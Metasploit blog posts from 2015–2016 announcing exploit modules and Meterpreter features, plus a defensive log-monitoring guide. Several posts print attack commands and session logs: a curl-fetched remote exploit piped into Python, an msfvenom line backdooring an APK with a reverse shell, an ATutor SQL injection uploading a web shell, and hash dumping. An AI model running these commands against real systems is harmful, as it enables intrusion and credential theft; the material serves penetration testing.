Skip navigation
All Places > Metasploit > Blog
1 2 3 Previous Next

Metasploit

648 posts
egypt

Weekly Metasploit Wrapup

Posted by egypt Employee May 20, 2016

Check the computer, the mainframe computer

 

This week's update comes with our first ever exploit module for z/OS, the operating system used by mainframes, from our friend Bigendian Smalls who also built the payloads. The module in question is an example of authenticated code execution by design, which takes advantage of a design feature allowing users to submit jobs via uploading files to an FTP daemon.

 

So all we have to do is load it anywhere into the credit union mainframe, and it'll do the rest.

 

More movie hacking

 

Also this week, we have a module straight out of the movies. Long-time contributor nstarke brings us another fun RCE-by-design exploit, this time for a TP-Link surveillance camera. From a network perspective it's just another embedded Linux system, of course, but having root on one of these things means you can potentially steal surveillance video or even replace the feed with old benign images while you steal those diamonds from under the nose of that hapless security guard.

 

Operations center with video surveillance monitors

 

 

Documenting modules

 

Our friendly neighborhood exploit dev, sinn3r, recently put together a really handy system for writing module documentation in markdown. I haven't mentioned it in a Wrapup yet because I'm working on a bigger announcement, but for now it will suffice to say that markdown docs are super fun and easy to write, and that figuring out how a module is supposed to work has never been easier. From msfconsole, just type info -d and you'll get the full knowledge base for the given module.

 

We've already added supporting documentation for several modules, including the new mainframe exploit module mentioned above. If you've ever wanted to contribute, but don't feel like you want to write code, this is a great place to get started.

 

New Modules

 

Exploit modules (3 new)

 

New Modules

Auxiliary and post modules (2 new)

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.11.26...4.12.2

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee May 11, 2016

Resolve, v. transitive

 

Sometimes the biggest things that make working with a tool fun are the small things. One of those things is the recent addition of a resolve command for Meterpreter. It does what it sounds like: it resolves a hostname to an IP address on the victim system, taking advantage of the local DNS. Of course, that's not a huge thing, but it is pretty convenient.

 

Strut, v. intransitive

 

This update also comes with a fun exploit for Apache Struts, a web framework for webby things. It's a Model-View-Controller framework for Java web applications, somewhat similar to Rails in the ruby world. Bugs in frameworks like this can end up lasting a lot longer than in applications, as all the things that depend on it have to be updated too.

 

Magick, n.

 

Also in this update is a shiny new exploit module for the latest Branded Vulnerability(tm), ImageTragick. In this case though, it can actually get you shells. As the advisory explains, this is a command injection vulnerability in the way image metadata is passed to a conversion utility. It's tough to gauge how useful this will be since it depends a lot on how applications use ImageMagick, but the potential is pretty shiny. If you've found something that uses it in a vulnerable way, it sure would be keen if you'd let us know and even more awesome would be a module for it in a new Pull Request.

 

Committer, n.

 

In great open-source-land news, we've added a new committer! As Tod mentioned the last time this happened, new committers don't come along very often and when they do it's usually surprising to learn that they aren't already committers because they've been around for quite a while. Mubix has been a long-time friend of the Metasploit family, helping out with code review, module development, and lots of testing. He has also helped countless people learn about Metasploit features with his fabulous Metasploit Minute series with Hak5.

 

5907607001_b3954dfaa9_b.jpgThe open source community has always been integral to Metasploit. Adding new Committers increases the Bus Factor of the project. Non-Rapid7 Committers are super important for the vitality of the project and help cement the relationship between Rapid7 and the community.

 

Also, Mubix is a personal friend of mine and I think he's a hoopy frood who really knows where his towel is. I'm excited to see how he'll use his new-found powers.

 

In fact, he's already landed his first Pull Request, which brings me to...

 

Portfwd, n.

 

Some of the most fun you can have with Meterpreter is by sending your evil packets through it. One way to do that is the portfwd command, which allows you to do what it sounds like -- forward connections from one port to another. This works pretty similarly to portfwarding in SSH, except that previously, it was only possible to listen on the attack platform and forward connections to the victim's network. As of this update, you can go the other direction as well. By setting up a reverse forward, you can tell Meterpreter to listen on the victim system and have it forwarded back to the network where Metasploit is running. For the latest in fun stuff happening in Meterpreter land, I recommend checking out OJ's recent bloggery on the subject.

 

New Modules

 

Exploit modules (3 new)

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.11.23...4.11.26

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Apr 27, 2016

I did some security research on industrial control systems for a while. It was a fun and rewarding experience in which I found tons of usually very simple bugs. Security in that sector was nascent, with the technology being brought forward from the dark ages of everything being on serial. Things are a bit different today, in no small part due to the fine work of many security researchers convincing vendors to step up their game and buyers learning how to ask the right questions before a purchase. SCADA gear is increasingly moving toward modern operating systems with modern security protections. This is very much a Good Thing (tm).

 

Nevertheless, software is hard. From last week's graph, you already know that the more software you have, the more likely that some of it is broken. Further, there's a lot of super old code in ICS.

 

Enter Adventech WebAccess Dashboard Viewer, "a fully web-based HMI and SCADA software package for industrial automation." It's basically a web application written in ASPX that lets you twiddle valves and flip switches. Like many web apps, it offers the ability to upload files, and like many web apps, it stores them in the web root and doesn't really care what those files are. Which, of course, means a very simple path to arbitrary code execution.

 

Maybe someday we'll get rid of newb mistakes. Not today, though.

 

New Modules

 

Exploit modules (1 new) * Advantech WebAccess Dashboard Viewer Arbitrary File Upload by Zhou Yu, and rgod exploits ZDI-16-128

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.11.21...4.11.22

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Apr 21, 2016

(In)security Appliances

 

IT management is a tough job with lots of moving parts. To deal with that reality, IT administrators use a lot of tools and automation to help keep an eye on all the devices they are responsible for, some custom, some off the shelf, and some big-box enterprisy stuff. What the sales rep won't tell you, though, is that every line of code you add to your network is more complexity. And as complexity increases, so does the risk of bugs. I made you a handy graph to illustrate what that looks like.

 

Untitled presentation.png

 

There are lots of statistics out there about bug density, all of which are flawed in some ways of course, but it really comes down to the more code you expose to the network, the higher the probability of there being an exploitable bug in that code. IT management tools and security appliances are no exception to that rule.

 

All of that is what makes vulnerabilities in these things possible (and even likely) but what makes them fun is they are often the custodians of some of the most important data on a network. An inventory management system will have... wait for it... a list of targets, probably with the name of the human associated with each of them which also gives you an idea of what kind of data they'll be holding. A patch/update management solution will most likely have a simple way to deploy executables (ostensibly to patch something) to lots of boxes all at once, an example of authenticated remote code execution by design on a massive scale. In other words, a thing you want to pwn.

 

This week we have another example of this class: Dell's KACE K1000 systems are intended to "[s]treamline IT asset management, secure network-connected devices, and service end-user systems more efficiently." Which all sounds to me like marketing-speak for pop boxes, steal data.

 

If you have any of these sorts of things in your network, it might be a good idea to make sure only IT staff can talk to it. Bob in finance doesn't need to see all that stuff.

 

If you are a pentester, anything that says "Administration" or "System Management" in its <title> tag is probably already a priority, so nothing I've said here is news to you.

 

New Modules

 

Exploit modules (3 new)

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.11.20...4.11.21

 

The bug image in my awesome graph is CC-By-SA MesserWoland.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Apr 15, 2016

Meterpreter Unicode Improvements

 

Pentesting in places where English is not the primary language can sometimes be troublesome. With this week's update, it's a little bit easier. After Brent's work making Meterpreter's registry system support UTF-8, you can now do things like use the venerable post/windows/gather/hashdump to steal hashes and other attributes of local users whose username contains non-ascii characters, e.g.:

 

msf > use post/windows/gather/hashdump
msf post(hashdump) > setg session -1
session => -1
msf post(hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 168de610cd477d23e9f7713684342744...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

bcook:"normal"
mönkey:"blah"

SSH Backdoors

 

In this week's episode of Authenticated Code Execution by Design, we have a couple of new SSH modules.

System administrators and attackers alike love to use services like SSH to get into and control systems. Sometimes, vendors use them for coordinating multiple systems performing the same task. Such is the case with ExaGrid backup storage devices. Each ExaGrid box uses SSH to talk to other ExaGrid devices on the network, presumably to keep an eye on disk usage and other metrics that such devices care about. To make things fun, this was accomplished by shipping the same passwordless private key on every device, so now Metasploit has that private key, too.

Going a little further back in time to last December, Juniper shipped a backdoored sshd on their ScreenOS devices after a compromise allowed attackers to modify it, allowing access with and username and the remarkably clever password <<< %s(un='%s') = %u. I love it because it doesn't stand out in the output of strings(1). Well played, unknown blackhat backdoor creators, well played. Now you can easily scan for these backdoors with Metasploit.

Consistent options display

 

When you type options in msfconsole, you get a nice table of the things your current module needs to know to do its job. Formerly, advanced and evasion options used a different layout that made it a lot harder to read, especially since there are usually a lot more of them than normal options. It has bothered me for a while and finally pissed me off enough to do something about it -- now all the option types give you the same kind of output.

New Modules

 

Exploit modules (6 new)

Auxiliary and post modules (7 new)

Get it

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.11.19...4.11.20

securing-your-metasploit-logsOriginal post from Logentries found here: Securing your Metasploit Logs

by Justin Buchanan

 

 

Metasploit, backed by a community of 200,000 users and contributors is the most impactful penetration testing solution on the planet. With it, uncover weaknesses in your defenses, focus on the highest risks, and improve your security outcomes. Your Metasploit Pro console produces a lot of important logs. It is essential to be able to review these logs, alert on them, and keep them secure.

 

Why should I monitor these logs?

The logs produced by your Metasploit Pro console are helpful when troubleshooting, and also for monitoring the usage of the Metasploit product. Metasploit Pro is impressively powerful, which also makes it crucial to closely monitor the usage. Unfortunately, you must always plan fo the worst possible scenario, including the potential for a Metasploit user to alter the logs created by the console to hide their actions. Sending these logs to a secure central location in real-time, can ensure that they remain unaltered and easy to review.

What and where are the Metasploit Pro Logs?

The list below details all of the logs created by your Metasploit Pro console and where they are saved. Your installation root directory may vary; by default the installation root for Linux is: /opt/metasploit and for Windows: C:\metasploit

  • $INSTALL_ROOT/apps/pro/nginx/logs/error.log – Console web server error log
  • $INSTALL_ROOT/apps/pro/nginx/logs/access.log – Console web server access log
  • $INSTALL_ROOT/apps/pro/ui/log/production.log – Rails (ruby) log
  • $INSTALL_ROOT/apps/pro/engine/config/logs/framework.log – Metasploit Framework log
  • $INSTALL_ROOT/apps/pro/engine/prosvc_stdout.log – Metasploit RPC output log
  • $INSTALL_ROOT/apps/pro/engine/prosvc_stderr.log – Metasploit RPC error log
  • $INSTALL_ROOT/apps/pro/tasks – Task logs
  • $INSTALL_ROOT/apps/pro/engine/license.log – License log

 

As a best practice, all of the above logs should be sent to a secure, off-site, location for storage and analysis. For the purposes of this post we will focus on the three most imperative logs:

  1. tasks
  2. framework.log
  3. access.log

 

The tasks directory

The tasks directory provides text files detailing all of the actions taken by all Metasploit users.  It will record any exploit that is run, the creation of a listener, establishment of a pivot, and any other action taken through the console.

 

Configure the Logentries Agent

To capture the log data saved to the tasks directory first ensure that you have installed the appropriate Logentries Agent on the Metasploit Console machine. The Logentries Agent can automatically identify and forward the newest log file written to a directory by using a wildcard configuration. For the Linux Agent issue the following command to follow the tasks directory:

sudo le follow '/opt/metasploit/apps/pro/tasks/*.txt'

and with the Windows Agent:

AgentService.exe follow c:\metasploit\apps\pro\tasks\*.txt

Always remember to restart the Logentries service after making changes to its configuration.

View in Logentries

Now as new tasks are written to the directory on your console server you can see them stream into Logentries in real time, creating an immutable offsite backup of these important audit trails.

 

Securing Your Metasploit Logs

framework.log

framework.log is your best friend when you are trying to troubleshoot an issue you are encountering with Metasploit. All the logged errors are saved here.  When you dig into this log you will gain insight into which exploits failed, and for what reasons, as well as general stack traces.

 

Configure the Logentries Agent

In this case, because framework.log is just a single file, there is no need for special configuration. The command to follow this file with the Linux Agent would simply be:

sudo le follow /opt/metasploit/apps/pro/engine/config/logs/framework.log

access.log

 

The final log discussed here is the NGINX access.log produced by the Metasploit console. The information available in this log is imperative to maintain complete audit trails of all actions taken in the console. This log will contain every request made to the web interface including the ip address of the requester, making it invaluable in an investigation.

 

Metasploit's NGINX server is configured to log in combined log format, and as a result Logentries will be able to perform in-depth analysis on these logs with ease.  The video below provides a tutorial on using the advanced search functionalities of Logentries to query an Apache access.log, all the same features and functionality will be available with this NGINX access.log.

 

building-a-query-how-to-video

 

Ready to secure your Metasploit logs? Give it a try by creating a free Logentries account today!

Yesterday, we announced the availability of a PowerShell extension for Meterpreter, primarily as a toy for laughs because no one would seriously consider using it for anything important.

 

But today? Today we've got a real treat for you. For serious programmers and serious pentesters, what you really want is a serious language. Something with the power of a Turing Machine and the readability of raw bytecode. Something beautiful and subtle, like a chainsaw. Something with a name you can pronounce in polite company, unlike the crude "Python".

 

You need BF.

 

2001_ape_monolith_460.jpg

 

Today, we landed an incredible tool that will be the benchmark for ease in post-exploitation for years to come. Today, you can run BF inside Meterpreter.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Mar 31, 2016

Powershell? In my Meterpreter?

 

It's more likely than you think!

 

Hot on the heels of his fantastic Python extension, the legendary OJ Reeves has once again busted out an awesome new ability for post-exploitation, this time by putting a fully functional powershell inside your native Windows Meterpreter sessions. Unlike the Python extension, which uploads an embedded interpreter, the new powershell extension loads the .NET runtime from the victim system.

 

There's a lot of polish and more work to be done here, but the shell is quite functional and gives you access to all kinds of capabilities. The next big improvement here is the ability to import files so you can take advantage of existing PS scripts, which is already in testing and should be out with the next update if everything goes to plan.

 

Metasploit3 is dead, long live MetasploitModule

 

Metasploit modules all define a class to implement their functionality. In the original plan, that class's name contained Metasploit's major version number so it would be possible to tell if a module was compatible. The way it really happened is the number just sat there doing nothing since the major version changes very infrequently. The most recent time was just after the project was acquired by Rapid7 a little over six years ago. Before that, the last time the major version changed was when the project was rewritten from scratch in 2005, ported from Perl to Ruby. In the last six years, many things have changed considerably -- APIs have been updated, moved, or deleted; new protocols have been added; someone injected SNES shellcode into Super Mario World by hand -- the world is a different place now.

 

Basically the idea that the major version would describe whether something is compatible was never real. So we've decided to get rid of the confusing pointless number in modules' class names and just call them MetasploitModule. Your existing custom modules will continue to work without modification, but with a warning that you should update the module's class name. You can make that update to all your custom modules with this one-liner:

 

find ~/.msf4/modules -name '*.rb' | xargs sed -i 's/class Metasploit[34]/class MetasploitModule/'

 

If you're on OS X, your sed(1) is dumb and requires an argumen to -i:

 

find ~/.msf4/modules -name '*.rb' | xargs sed -i '' 's/class Metasploit[34]/class MetasploitModule/'

 

Up Up Down Down UDP Select Start

 

One of my favorite things about Metasploit is its socket abstractions. The ability to create sockets from a Meterpreter session and treat them as a regular Ruby socket is very powerful -- it's what powers port forwarding and routing. Recently it came to long-time contributor sempervictus' attention that UDP didn't behave quite the same way as TCP in this regard. Because UDP sockets created on a Meterpreter session didn't return a normal socket, they couldn't be passed to the low-level select method. Now that UDP works just like TCP, it opens up some new ways we can use them for evil awesome.

 

Words, Words, Words

 

This update comes with several improvements to documentation. The first is a tool called find_release_notes that allows you to find the release notes for a given pull request or module so you can quickly figure out the historical context of when a thing made it into the stable release. You can find it in the tools/dev directory.

 

Next, we've added some new templates for submitting GitHub Issues and Pull Requests which will hopefully standardize the process of contributing and make it a little easier for contributors. Knowing what is expected beforehand means less back-and-forth for new contributors, smoothing out and speeding up the whole Pull Request process.

 

And my favorite new documentation addition in this update is a way of documenting individual modules. A new directory, documentation/modules/, matches the layout of the modules/ and contains markdown files describing how the corresponding module can best be utilized. A handful of the most important modules already have documentation and more are on the way. The great thing about it is it's just markdown, so it's super easy to write, and incidentally writing simple walkthroughs of existing modules is a great place to get started contributing. To check it out, you can use the info command's new -d flag (for "documentation") to turn that markdown into a nice HTML page and view it in a browser. There are more details in the wiki article Generating Module Documentation.

 

New Modules

 

Exploit modules (1 new)

 

Auxiliary and post modules (5 new)

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.11.14...4.11.19

William Vu

Weekly Metasploit Wrapup

Posted by William Vu Employee Mar 14, 2016

Scanning for the Fortinet backdoor with Metasploit

 

Written by wvu

 

Metasploit now implements a scanner for the Fortinet backdoor. Curious to see how to use it? Check this out!

 

wvu@kharak:~/metasploit-framework:master$ ./msfconsole -qL
msf > use auxiliary/scanner/ssh/fortinet_backdoor 
msf auxiliary(fortinet_backdoor) > set rhosts 417.216.55.0/24
rhosts => 417.216.55.0/24
msf auxiliary(fortinet_backdoor) > set threads 100
threads => 100
msf auxiliary(fortinet_backdoor) > run

[*] Scanned 35 of 256 hosts (13% complete)
[*] Scanned 84 of 256 hosts (32% complete)
[*] Scanned 90 of 256 hosts (35% complete)
[+] 417.216.55.69:22 - Logged in as Fortimanager_Access
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 136 of 256 hosts (53% complete)
[*] Scanned 174 of 256 hosts (67% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 233 of 256 hosts (91% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(fortinet_backdoor) > 
[1]+ Stopped ./msfconsole -qL
wvu@kharak:~/metasploit-framework:master$ python <(curl -s https://www.exploit-db.com/download/39224) 417.216.55.69
FortiGate-VM64 # 
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
exit Exit the CLI.

FortiGate-VM64#


Easy as can be.

 

The module doesn't get sessions yet due to complications with net-ssh, but we're working on it!

 

Shall we play a game, ATutor?

 

Written by Bill Webb

 

header_small.png

 

Ever wished you could live out your Wargames fantasies, easily changing your grades all while impressing the ladies?  Now you can with the addition of the ATutor 2.2.1 SQL injection module.  This module exploits the vulnerability described in CVE-2016-2555, allowing one to bypass authentication and reach the administrators interface.  While reaching the vulnerability requires one to login to ATutor as a student, remote registration is enabled by default.  Once you have gained access to the admin console, you can do all sorts of fun stuff, such as uploading malicious code ...

 

msf exploit(atutor_sqli) > check
[+] The target is vulnerable.
msf exploit(atutor_sqli) > exploit

[*] Started reverse TCP handler on 192.168.1.199:4444 
[*] 192.168.1.202:80 - Logged in as admin, sending a few test injections...
[*] 192.168.1.202:80 - Dumping username and password hash...
[+] 192.168.1.202:80 - Got the admin hash: bcbc84567720217d190cab05ac3bf7722f2936ca !
[*] 192.168.1.202:80 - Logged in as admin, uploading shell...
[+] 192.168.1.202:80 - Shell upload successful!
[*] Sending stage (33684 bytes) to 192.168.1.202
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.202:49271) at 2016-02-29 18:44:11 -0600
[+] 192.168.1.202:80 - Deleted ocfw.php
[+] 192.168.1.202:80 - Deleted ../../content/module/qee/ocfw.php

meterpreter >


... or pulling off their best Matthew Broderick impersonation.

 

grades.gif

 

It's almost like it's 1983 again.

 

(We can't guarantee that the ladies will in fact be impressed ...)

 

New modules

 

Exploit modules (3 new)

 

Auxiliary and post modules (6 new)

 

Get it

 

As always, these new features are only an msfupdate away! You can view the changes here: 4.11.10...4.11.14.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Feb 19, 2016

A little entropy goes a long way

 

Meterpreter can communicate via straight TCP or over HTTP(S), but whatever the transport, the protocol is pretty much the same. It uses what is called a TLV protocol, for Type-Length-Value. In truth, meterpreter actually does it in a different order: Length, Type, Value. Each meterpreter packet is a collection of TLVs and is itself a TLV. That makes it so you can skip over a type or even a whole packet without having to know how to parse it, but that doesn't really matter. What's important for us when talking about what this looks like on the wire is that each packet's method is a recognizable string in the header. That in turn makes it easier for IDS/IPS to get angry with our packets. And we don't like making them angry. As of this week, that recognizable string is no longer recognizable. Instead, it's xor'd with a random value so no two packet headers are alike (probablistically).

 

More Android fun

Debugging like a boss

 

ADB is a debugging tool for android that you can enable by turning on the phone's developer mode. It can run as a TCP server, much like GDB server does, and convincing a debugger to run code for you is pretty straight forward, since that's kinda what it's for. Typically, remote debuggers aren't exposed to real networks, but you never know. Where this is more likely to show up is on a developer's machine, where the adb service is used to communicate with a local emulator or a device connected via USB. Now with exploit/android/adb/adb_server_exec, you can upload a native payload to those devices for fun and profit.

 

Backdoor all the things

 

For a longer term solution, you might want to take advantage of the new ability in msfvenom to use an existing APK as a template. First, you'll need a couple of external tools -- jarsigner from any ol' java sdk and apktool. Once those are squared away, you can take something like Facebook's APK and inject a Meterpreter payload on top of it: 

 

msfvenom -x foo.apk -p android/meterpreter/reverse_tcp LHOST=8.8.8.8 -o bar.apk

 

Bad intentions, or Badass intentions?

 

Intents are neat. They're basically a way to tell an android device, "run whatever app is registered to handle this thing." One of the most common is android.intent.action.VIEW, which handles images and web pages and such. There's now a new command called `activity_start` that lets you manually invoke arbitrary intents. So once you've got that Meterpreter session, you can do this

activity_start intent://youtube.com/watch?v=dQw4w9WgXcQ&autoplay=1#Intent;scheme=http;action=android.intent.action.VIEW;end 

and have everyone's favorite song play on youtube. There's another one called BOOT_COMPLETED that lets you register a thing to run when the phone is finished booting; basically built-in persistence. We've had this one enabled for a while now, but we haven't mentioned it here yet: as long as you install the APK and run it once, the device will kindly restart it everytime it comes back on.

 

New Modules

 

Exploit modules (2 new)

 

Auxiliary and post modules (4 new)

 

Get it

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff is available on GitHub: 4.11.7...4.11.10

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jan 22, 2016

I'm not your mother, clean up after yourself.

 

An old friend of mine, axis2_deployer, is a fun authenticated code execution module that takes advantage of Axis2's ability to deploy new applications on a web server. It used to be a messy friend, leaving its files all over the living room floor for you to clean up manually. As of #6457, you don't have to worry about those files any more because it uses the FileDropper mixin. When you're writing a module that requires putting something on the file system, the polite thing to do is delete it when you're done and that's exactly what FileDropper is for. Just include the mixin and call register_file_for_cleanup with the remote path, and when a session is created Metsaploit will use it to delete your mess.

 

Code of Conduct

 

The wider development community has been talking about Codes of Conduct for a while now as a result of a lot of poor behavior. The Metasploit Project has been fortunate not to have had to deal with jerks on the scale that some other projects have, but in order to head those jerks off at the pass, Metasploit now has a Code of Conduct.

Here's an excerpt that explains the motivation:

  We are committed to making participation in this project a harassment-free   experience for everyone, regardless of level of experience, gender, gender   identity and expression, sexual orientation, disability, personal appearance,   body size, race, ethnicity, age, religion, or nationality.

This CoC provides a way for you to contact us and let us know about unacceptable behavior in the community as well as providing guidelines so people know what to expect when such things must be enforced.

  Project maintainers have the right and responsibility to remove, edit, or   reject comments, commits, code, wiki edits, issues, and other contributions   that are not aligned to this Code of Conduct, or to ban temporarily or   permanently any contributor for other behaviors that they deem inappropriate,   threatening, offensive, or harmful.

 

For developers and potential contributors, this means we've got your back. The goal is to give you confidence that if things go wrong, there is already a plan in place and rules that can help. I think it's also important to point out that there was zero dissent in the Pull Request discussion among current committers about whether to adopt this CoC. The building isn't currently on fire, but we as a community, and I personally, want you to be safe putting it out if one comes along.

 

The previous law of the land in the People's Republic of Metasploit was an informal adherance to Wheaton's Law, and that still stands. By adopting a more formal and explicit set of rules, we intend to foster a more welcoming environment where everyone feels comfortable making their first Pull Request.

 

New Modules

Auxiliary and post modules

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff is available on GitHub: 4.11.6...4.11.7

 

Happy hacking.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jan 11, 2016

Aaaaaand we're back! Last week was the first weekly update of the year and it comes with a super fun stuff.

Tunneling

The latest update allows you to tunnel reverse_tcp sessions over a compromised machine in a slightly less painful way. There is now a new datastore option, ReverseListenerComm, which lets you tell a meterpreter session tunnel connections back to your payload handler. Here's an example run to give you the idea:

 

msf exploit(payload_inject) > show options


Module options (exploit/windows/local/payload_inject):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   NEWPROCESS  true             no        New notepad.exe to inject to
   PID                          no        Process Identifier to inject of process to inject payload.
   SESSION                      yes       The session to run this module on. 

Payload options (windows/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST     127.0.0.1        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:


   Id  Name
   --  ----
   0   Windows


msf exploit(payload_inject) > set ReverseListenerComm 1
ReverseListenerComm => 1

msf exploit(payload_inject) > set SESSION 1
SESSION => 1
msf exploit(payload_inject) > run 

[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1
[*] Running module against WIN-2DE8F2QP867
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 3092
[*] Sending stage (884270 bytes)
[*] Meterpreter session 2 opened (192.168.5.101-192.168.5.1:4444 -> 127.0.0.1:63173) at 2015-05-20 00:09:44 +0100

meterpreter >

 

The really important line there is this:

[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1

The compromised machine is listening on its localhost for the new connection, but it doesn't have to be localhost, you can tell it to listen on an external address and use psexec against a second internal machine. This used be possible by creating a route and setting your LHOST to a victim machine's IP address within that route, but it wasn't really clear how to do it and the settings were quite error prone; now it's just a single option to tell Metasploit explicitly where to listen for the payload.

Super fun modules

Joomla

This update comes with a pre-authentication exploit for Joomla, the popular CMS, another in a rich and storied history of deserialization bugs. We've also abstracted some common things into a Joomla mixin, so the next time one of these comes along, writing the exploit is will be faster and easier.

Hacking Time

hoff-hacking-time-500x333.jpg

From the module description:

The end goal is to cause ntpd to declare the legitimate peers "false tickers" and choose the attacking clients as the preferred peers, allowing these peers to control time.

Now you, too, can go... NAK to the Future!

 

Exploit modules

 

Auxiliary and post modules

 

 

As always, you can get all these modules and improvements with a simple msfupdate and the full diff is available on GitHub:  4.11.5-2015121501...4.11.5-2016010401

As a result of export restrictions placed on Metasploit Community and Pro trials, this year we have introduced some new systems to help process license requests. We have received a lot of questions about this, and this post will hopefully answer some of them for you. If you haven't read the original blog post about the export controls, please take a moment to review the information there on the updates and who is affected.

 

To help shed light on why some requests from those outside the U.S. or Canada for Metasploit Community or Pro license keys may be denied, below we list some common mistakes we've seen since this process began. To increase the likelihood of your request being quickly approved, be sure to avoid these pitfalls.

 

1) Supply a legitimate physical mailing address

All applications must include a valid physical mailing address, without exception. We frequently receive applications with blank information, gibberish, numbers, or dashes (e.g. -----,----- or 12345, 12345 or ghjghjgh, ghujhgjg).

  • Please only use Latin characters, without accents. Non-Latin characters, including Cyrillic, Arabic, Chinese, and Japanese characters, cannot be validated (e.g. 瑞安中心 6- 8海港路湾仔香港). Also, accents often render incorrectly, so please do not use any accented characters (e.g. 43 Rue Delarivi�re Lefoullon, Paris).
  • The address must be specific at a street level. Unfortunately geocodes to a neighborhood, city, or county level are not sufficient (e.g. Beijing, Beijing).
  • You must not be located in a U.S.-embargoed country: Cuba, Crimea, North Korea, Iran, Sudan, or Syria.

 

2) Disclose any government affiliations clearly in your application

In addition to address-related issues, we also have seen a number of problems relating to applications from government agencies. Sometimes we'll receive an application from an agency that either is not eligible for an exemption from export restrictions, or did not self-identify as a government agency when applying. In both cases these kinds of applications will be rejected.

 

We realize this application process may seem cumbersome and appreciate your patience as we process your license key request, as each application is manually and individually verified by a legal team. We only ask for information that is required by the U.S. Government export regulations, so please note that omitting or falsifying any information on the application form will most certainly invalidate your application.

 

As always, if you are outside the U.S. or Canada and interested in evaluating Metasploit Pro, don't hesitate to reach out to your Account Executive directly. We appreciate your cooperation as we work to comply with U.S. government regulations.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Dec 17, 2015

Welcome to the last Metasploit update of the year! Since January 1st, 2015, we've had 6364 commits from 176 unique authors, closed 1119 Pull Requests, and added 323 modules. Thank you all for a great year! We couldn't have done it without you.

 

Sounds

 

The sounds plugin has been around for a long time, notifying hackers of new shells via their speakers since 2010. Recently, Wei sinn3r Chen gave it a makeover, replacing the old robotic voice with that of Offensive Security founder, Kali Linux Core Developer, and all-around cool guy Mati "muts" Aharoni. Now when you get a new session, you'll be treated to his sultry voice congratulating you and when an exploit fails, he'll encourage you to try harder. Just type "load sounds" in msfconsole to hear it in action.

 

New Modules

 

We have eight new modules this week -- 5 exploits and 3 post modules. Among them is an exploit for Jenkins that takes advantage of the java deserialization issue brought to the world's attention by FoxGlove Security a few weeks ago. More exploits for similar vulnerabilities are undoubtedly on the way.

 

Exploit modules

 

Auxiliary and post modules

 

Get it

As always, you can get all these modules and improvements with a simple msfupdate and the full diff is available on GitHub: 4.11.5-2015120901...4.11.5-2015121501

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Dec 11, 2015

Payloads

 

New in the latest Metasploit release are stageless HTTP and HTTPS payloads for Python for those times when you would rather have the whole thing in one file instead of having to stage it. For more on the advantages and quirks of stageless payloads, check out @OJ's post on the subject from when support was first added for Windows.

 

Exploit Modules

 

Does anybody remember that bash(1) bug from a little over a year ago? The one with environment variables getting executed as functions or something? Man, those celebrity bugs, they go off to rehab and everybody forgets about them. Well, Advantech forgot at least, since their EKI Modbus gateways use a vulnerable version of bash to serve cgi scripts. In all seriousness, Shellshock will be with us for a very long time, cropping up in production systems and embedded devices like this for many years to come. Despite the frequent comparison with Heartbleed because of the hype at the time, I personally think it's a much more useful bug. Full shell access is better than memory read access any day of the week.

 

So next time you're doing a pentest and you see something embedded, why not try a little Shellshock?

why-not-shellshock.png

 

Another fun module for this wrapup is for an old vulnerability, but part of a theme I always enjoy. For some background, chkrootkit(1) is a Linux security tool intended to discover whether a system is compromised via certain artifacts such as files commonly left around by worms. One of the checks it does is for a file named /tmp/update. Unfortunately, due to some missing quotes, vulnerable versions of chkrootkit won't just check for existence of that file, but will run it instead. As root. Now, I'd be remiss not to mention that this was patched by all the major distributions in mid-2014 and it's the kind of thing you don't usually find on embedded devices. So in contrast to bash, which is installed by default on just about every kind of device you can think of, you're not going to run into it all that often. It's still a fun bug.

 

Performance Improvements

 

Thanks to the work of community contributors Jon Cave and Meatballs, meterpreter file downloads and uploads have improved considerably. While there is still some room for improvement in this area, it's now possible to upload and download files in the tens of megabytes range in a reasonable amount of time across all the meterpreter implementations. Interestingly, Python meterpreter was the fastest in my testing, pulling down a 32MB file in 19 seconds, or roughly 13.47Mb/s.

 

Exploit modules

 

